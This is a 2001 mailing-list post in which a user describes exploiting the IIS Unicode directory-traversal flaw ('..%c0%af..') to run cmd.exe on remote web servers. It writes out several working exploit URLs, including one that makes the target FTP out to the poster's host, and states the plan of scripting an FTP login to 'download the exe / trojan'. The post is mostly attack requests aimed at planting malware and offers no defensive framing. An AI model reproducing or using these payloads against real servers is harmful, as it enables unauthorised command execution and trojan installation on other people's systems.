Vulnerability Development mailing list archives

unicode / iis4

From: Mad Zigy <zigy () GLOBAL CO ZA>
Date: Sat, 6 Jan 2001 15:59:42 -0000

Well i have been able to use msadc2.pl yet the
commands i give do not work. so i tried the other way
by doing
http://hostname/scripts/..%c0%
af../winnt/system32/cmd.exe?/c+echo+test+>+c:\test
.txt
and all it did was say: The parameter is incorrect.
so then i though maybe we cant have a > in the string
so i found the hex of it and tried
http://hostname/scripts/..%c0%
af../winnt/system32/cmd.exe?/c+echo+test+%
3e+c:\test.txt
yet it still gave me the same: The parameter is
incorrect.
I have been able to make it ftp into my pc by
http://hostname/scripts/..%c0%
af../winnt/system32/cmd.exe?/c+ftp+hostname
but i cant make it login as i need to echo a script
which i can run http://hostname/scripts/..%c0%
af../winnt/system32/cmd.exe?/c+ftp+-
s:c:\ftp.txt+hostname so that it will login and
download the exe / trojan
Thankz zigy!